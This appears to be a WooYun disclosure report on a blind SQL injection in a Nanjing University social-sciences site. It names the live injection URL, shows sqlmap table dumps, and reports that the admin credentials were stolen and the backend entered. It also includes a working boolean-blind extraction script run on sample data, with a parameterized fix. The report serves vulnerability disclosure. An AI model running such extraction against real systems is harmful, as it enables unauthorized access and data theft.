WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, browse online -------- http://drop.zone.ci/
2015-05-22: Details sent to the vendor, awaiting vendor handling
2015-05-26: Vendor has confirmed; details disclosed to the vendor only
2015-06-05: Details disclosed to core white hats and domain experts
2015-06-15: Details disclosed to regular white hats
2015-06-25: Details disclosed to intern white hats
2015-07-10: Details disclosed to the public
A blind SQL injection in the Nanjing University Office of Social Sciences site... it exposes most of the data.
Injection point
http://skch.nju.edu.cn/showliterary.php?id=65
Ran it through sqlmap and the databases came out....
Never expected the application's database account to have 'sa' privileges; taking this server probably wouldn't be hard either. Look...
Then kept going... and dumped a lot of tables
[18:36:42] [INFO] fetching tables for database: msdb
[18:36:42] [INFO] the SQL query used returns 92 entries
Database: msdb
[92 tables]
MSdatatype_mappings, MSdbms_datatype_mapping, MSdbms_datatype_mapping, MSdbms_datatype_mapping, MSdbms_map,
backupfilegroup, backupfilegroup, backupmediafamily, backupmediaset, backupset,
log_shipping_monitor_alert, log_shipping_monitor_error_detail, log_shipping_monitor_history_detail,
log_shipping_monitor_primary, log_shipping_monitor_secondary, log_shipping_primaries,
log_shipping_primary_databases, log_shipping_primary_secondaries, log_shipping_secondaries,
log_shipping_secondary_databases, log_shipping_secondary_databases, logmarkhistory,
restorefilegroup, restorefilegroup, restorehistory, sqlagent_info, suspect_pages, sysalerts,
syscachedcredentials, syscategories, sysdatatypemappings, sysdbmaintplan_databases, sysdbmaintplan_history,
sysdbmaintplan_jobs, sysdbmaintplans, sysdownloadlist, sysdtscategories, sysdtslog90,
sysdtspackagefolders90, sysdtspackagelog, sysdtspackages90, sysdtspackages90, sysdtssteplog, sysdtstasklog,
sysjobactivity, sysjobhistory, sysjobs_view, sysjobs_view, sysjobschedules, sysjobservers,
sysjobstepslogs, sysjobstepslogs, sysmail_account, sysmail_allitems, sysmail_attachments_transfer,
sysmail_attachments_transfer, sysmail_configuration, sysmail_event_log, sysmail_faileditems, sysmail_log,
sysmail_mailattachments, sysmail_mailitems, sysmail_principalprofile, sysmail_profileaccount,
sysmail_profileaccount, sysmail_query_transfer, sysmail_send_retries, sysmail_sentitems, sysmail_server,
sysmail_servertype, sysmail_unsentitems, sysmaintplan_logdetail, sysmaintplan_logdetail,
sysmaintplan_plans, sysmaintplan_subplans, sysnotifications, sysoperators, sysoriginatingservers_view,
sysoriginatingservers_view, sysproxies, sysproxylogin, sysproxyloginsubsystem_view, sysproxysubsystem,
sysschedules_localserver_view, sysschedules_localserver_view, syssessions, syssubsystems,
systargetservergroupmembers, systargetservergroups, systargetservers_view, systargetservers_view, systaskids

[Table listing for the application database; the database name and the beginning of the listing are missing from the source]
DM_PROJECT_COOPERATE, DM_PROJECT_FORM, DM_PROJECT_LEVEL, DM_PROJECT_SOURCE, DM_PROJECT_STATE,
DM_PROJECT_STAT_SOURCE, DM_PRO_CHECKUP, DM_PRO_FINISH_FORMAL, DM_PUBLISH_ADDRESS, DM_PUBLISH_LEVLE,
DM_PUBLISH_RANGE, DM_QUERY_LOGIC, DM_REPORT_TYPE, DM_RESEARCH_TYPE, DM_RESEARCH_UNIT_KIND,
DM_RESEARCH_UNIT_LEVEL, DM_RESEARCH_UNIT_TYPE, DM_RESHIP_NAME, DM_RESHIP_TYPE, DM_RIGHT, DM_ROLE_LEVEL,
DM_ROLE_LEVEL, DM_SCHOOL_SIGN, DM_SCHOOL_SIGN, DM_SCHOOL_SUBJECT, DM_SEARCH_TYPE, DM_SECRET_LEVEL,
DM_SECRET_TIER, DM_SEX, DM_SHJJMB, DM_STA_TYPE, DM_SUBJECT, DM_SUB_CONTRACT_TYPE, DM_TEACHER_TYPE,
DM_TICHENG_PROPORTION, DM_TITLE_DEFINE, DM_TITLE_LEVEL, DM_TITLE_TYPE, DM_TRANSPRODUCT_TYPE, DM_TUTOR,
DM_UNITBOOK_TYPE, DM_UNITHONOR_TYPE, DM_UNITJDPRODUCT_TYPE, DM_UNITPAPER_TYPE, DM_UNITPERSON_TYPE,
DM_UNITPROJECT_TYPE, DM_UNIT_LEVEL, DM_UNIT_ORDER, DM_UNIT_TYPE, DM_UNIT_ZCLX, DM_WEB_COUNT, DM_YEAR,
KH_ASSESS_RESULT_STATE, KH_ASSESS_STATE, KH_ASSESS_TIME, KH_ATTRIB_VALUE, KH_ATTRIB_VALUE,
KH_CUSTOMIZE_DISTRIBUTE_MODE, KH_DISPLAY_ATTRIB, KH_OBJECT_ATTRIB_MODE, KH_OBJECT_ATTRIB_MODE,
KH_OBJECT_WEIGHT_MODE, KH_PERSON, KH_POSITION_ASSESS, KH_RESULT_COMPUTE, KH_RESULT_DETAIL, KH_SCHEME,
KH_TARGET, KH_UNIT, KH_WEIGHT_VALUE, KH_WEIGHT_VALUE, KJ_BASE10, KJ_BASE2, KJ_BASE5, KJ_BOOK_TYPE,
KJ_EDU_LEVEL, KJ_HONOR_LEVEL, KJ_HONOR_TYPE, KJ_HONOR_UNIT_ORDER, KJ_INDUSTRY, KJ_PROJECT_HZXS,
KJ_PROJECT_SOURCE, KJ_PROJECT_ZZXS, KJ_PUBLISH_AREA, KJ_QKLX, KJ_QKZQ, KJ_QK_LANGUAGE, KJ_RESEARCH_TYPE,
KJ_SEX, KJ_ST7_CATEGORY, KJ_SUBJECT_CLASS, KJ_SUBJECT_CLASS, KJ_TITLE_LEVEL, KJ_TITLE_TYPE, KJ_UNIT_CLASS,
KJ_UNIT_FORM, KJ_UNIT_TYPE, PERSON, PRODUCT_AUTHOR_VIEW, PRODUCT_AUTHOR_VIEW, PRODUCT_VIEW,
RESEARCH_UNIT_BOOK, RESEARCH_UNIT_HONOR, RESEARCH_UNIT_JDPRODUCT, RESEARCH_UNIT_PAPER, RESEARCH_UNIT_PERSON,
RESEARCH_UNIT_PRODUCT, RESEARCH_UNIT_PROJECT, SK_ACHIEVEMENT, SK_ACTIVE_TYPE, SK_ACTIVE_TYPE,
SK_AUTHORIZE_DEP, SK_BASE8, SK_DOWNLOAD, SK_EDU_DEGREE, SK_EDU_LEVEL, SK_FILE_MANAGE_TYPE,
SK_FILE_MANAGE_TYPE, SK_HONOR_GRADE, SK_HONOR_LEVEL, SK_LINKING, SK_LITERARY, SK_LOCATION,
SK_MEETING_TYPE, SK_NOTICE_TYPE, SK_NOTICE_TYPE, SK_PERSON_TYPE, SK_PERSON_TYPE, SK_PICNEWS, SK_PRIZE,
SK_PRODUCT_MODE, SK_PROJECT_SOURCE, SK_PROJECT_STATUS, SK_PUBLISH_CIRCLE, SK_PUBLISH_RANGE,
SK_RESEARCH_TYPE1, SK_RESEARCH_TYPE1, SK_RESEARCH_TYPE1, SK_RESEARCH_UNIT_TYPE, SK_SEX, SK_STUDY_MANAGER,
SK_SUBJECT, SK_TITLE, SK_UNIT_FORM, STATISTIC_STATE, STATISTIC_STATE, STA_ACTIVITY_2008,
STA_ACTIVITY_2008, STA_FEE_2008, STA_FEE_2008, STA_PERSON1_2008, STA_PERSON1_2008, STA_PERSON1_2008,
STA_PERSON2_2008, STA_PERSON2_2008, STA_PRODUCT2_2008, STA_PRODUCT2_2008, STA_PRODUCTHONOR_2008,
STA_PRODUCTHONOR_2008, STA_PRODUCT_2008, STA_PRODUCT_2008, STA_PROJECT1_2008, STA_PROJECT1_2008,
STA_PROJECT2_2008, STA_PROJECT2_2008, STA_RESEARCH_2008, STA_RESEARCH_2008, STA_UNIT, S_ACT, S_ARTICLE,
S_ART_PRODUCT, S_ASSESS_TIME, S_ATTACHMENT, S_ArtProduct_Author, S_BOOK_AUTHOR, S_BOOK_AUTHOR,
S_BREED_AUTHOR, S_BREED_AUTHOR, S_COLUMN, S_CONDITION, S_DOCUMENT_ACCEPT, S_DOCUMENT_ACCEPT,
S_DOCUMENT_RESPONSE, S_DOWNLOAD, S_EDITION_SUBMODULE, S_EMAIL_INFO, S_EMAIL_INFO, S_EXPRESS_ADVANCED,
S_EXPRESS_DEFAULT, S_EXPRESS_SIMPLE, S_HELP, S_HONOR_AUTHOR, S_HONOR_AUTHOR, S_INCOME_PEITAO,
S_JDPRODUCT_AUTHOR, S_JDPRODUCT_AUTHOR, S_JOIN_MEETING, S_KJ_STAT, S_KY_PLAN, S_LECTURE, S_MAGAZINE,
S_MAIN_MANAGE_UNIT, S_MANAGE_UNIT, S_MEDICINE_AUTHOR, S_MEDICINE_AUTHOR, S_MEETING, S_MIDDEL_CHECK_PROJECT,
S_MODULE_TERM, S_NOTIRY, S_PAPER_AUTHOR, S_PAPER_AUTHOR, S_PAPER_EMBODY, S_PAPER_RESHIP, S_PATENT_AUTHOR,
S_PATENT_AUTHOR, S_PATENT_PAY, S_PERSON_MANAGER, S_PERSON_MANAGER, S_PRODUCTTRANS_AUTHOR,
S_PRODUCT_TRANSFORM, S_PROJECT_APPLY_BOOK, S_PROJECT_APPLY_BOOK, S_PROJECT_APPLY_INFO,
S_PROJECT_COMPLETION, S_PROJECT_CONTRACT_FEE, S_PROJECT_DRAWBACK, S_PROJECT_FEE_BALANCE, S_PROJECT_INCOME,
S_PROJECT_INVOICE, S_PROJECT_MEMBER, S_PROJECT_MIDDLE_CHECK_BOOK, S_PROJECT_MIDDLE_CHECK_INFO,
S_PROJECT_PAYOUT, S_PROJECT_PLAN, S_PROJECT_YEAR_FEE, S_PRO_MEMBER_INCOME, S_RESEARCH_REPORT_AUTHOR,
S_RESEARCH_REPORT_AUTHOR, S_RESEARCH_UNIT_BOOK, S_RESEARCH_UNIT_BOOK, S_RESEARCH_UNIT_HONOR,
S_RESEARCH_UNIT_JDPRODUCT, S_RESEARCH_UNIT_JOIN_PRODUCT, S_RESEARCH_UNIT_PAPER, S_RESEARCH_UNIT_PERSON,
S_RESEARCH_UNIT_PROJECT, S_RIGHT_ROLE, S_ROLE_SUBMODULE, S_SCHOOL_FEE, S_SCHOOL_FEE, S_SHORT_MESSAGE,
S_SOURCESHARE, S_STAT_MAGAZINE, S_STA_CONVERT_ITEM, S_STUDY_MANAGER, S_SUBPROJECT, S_UNIT, actions, admin,
batch, blocked_ips, book_author, cache_bootstrap, cache_bootstrap, cache_form, cache_menu, cache_page,
cache_path, date_format_type, dtproperties, meeting, paper_author, paper_author, product_achieve,
product_achieve, project_outlay, project_outlay, project_work, rd_check_data1, rd_common_state,
rd_common_state, rd_patent_info, research_sta, role, school_fee, statistic_submodule, unit_person,
unit_person, unit_product, unit_project, variable
[18:03:17] [INFO] fetched data logged th.nju.edu.cn'
[*] shutting down at 18:03:17
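How a boolean-based blind injection like this one turns a yes/no difference in the page into dumped rows, and what the parameterized fix looks like, as an added example that is not code from the original report or the target site. It assumes a page that splices the id parameter straight into its query; SQLite stands in for the real MS SQL Server backend so the script runs offline, and the table, user name and password are constructed sample data.

```python
import sqlite3

# Constructed stand-in for the target's database. The real backend was
# MS SQL Server; SQLite is used only so this example runs offline.
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE literary (id INTEGER PRIMARY KEY, title TEXT);
INSERT INTO literary VALUES (65, 'Annual work report');
CREATE TABLE admin (username TEXT, password TEXT);
INSERT INTO admin VALUES ('skadmin', 'Nju#2015');   -- constructed sample data
""")

REQUESTS = {"count": 0}   # how many "HTTP requests" the extractor needed


def show_literary_vulnerable(id_param: str) -> bool:
    """Stand-in for a showliterary.php that concatenates ?id= into the SQL.
    Returns True if a row rendered, which is all a blind attacker observes."""
    REQUESTS["count"] += 1
    sql = "SELECT title FROM literary WHERE id=" + id_param
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


def show_literary_fixed(id_param: str) -> bool:
    """Same page with the id validated as an integer and bound as a parameter."""
    REQUESTS["count"] += 1
    try:
        value = int(id_param)
    except ValueError:
        return False
    row = conn.execute("SELECT title FROM literary WHERE id=?", (value,)).fetchone()
    return row is not None


def oracle(page, condition: str) -> bool:
    """Ask the page a yes/no question: the row for id=65 only renders
    when the injected condition is true."""
    return page("65 AND (" + condition + ")")


def blind_extract(page, expr: str, max_len: int = 32) -> str:
    """Recover the string value of SQL expression `expr` one character at a
    time by binary-searching its character code (about 7 requests per
    character, the approach sqlmap's boolean-based blind technique uses).
    SQLite spelling: unicode(substr(...)); on MS SQL Server the equivalent
    is ASCII(SUBSTRING(...))."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(page, f"unicode(substr(({expr}),{pos},1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:   # past the end: substr() gives '' and unicode('') is NULL, so every test fails
            break
        out += chr(lo)
    return out


def dump_admin(page) -> tuple:
    """Pull the first admin row the way the report's final step did."""
    return (blind_extract(page, "SELECT username FROM admin"),
            blind_extract(page, "SELECT password FROM admin"))


if __name__ == "__main__":
    REQUESTS["count"] = 0
    print("vulnerable page:", dump_admin(show_literary_vulnerable), "requests:", REQUESTS["count"])
    REQUESTS["count"] = 0
    print("fixed page:     ", dump_admin(show_literary_fixed), "requests:", REQUESTS["count"])
```

Against the vulnerable page the loop gives up the admin row in roughly seven requests per character; against the parameterized page the injected text never reaches the parser, the oracle never fires, and the extractor returns empty strings. With the application login running as sa on MS SQL Server, the same loop can read any database on the instance, which is what makes the reported finding so severe.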
Finally, got the admin username and password
Successfully logged into the admin backend:
Found a lot of things in there...
From here the school's office automation system site can be reached... but forget it, I'll stop here and be a good citizen!
Fix suggestion: strictly filter keywords and strengthen both front-end and back-end defenses! (Keyword filtering on its own is bypassable; the durable fix is parameterized queries for every database call, plus moving the application off the sa login to a least-privileged database account.)
Severity: High
Vulnerability Rank: 12
Confirmed: 2015-05-26 15:04
Submitted to the relevant business department for handling
None yet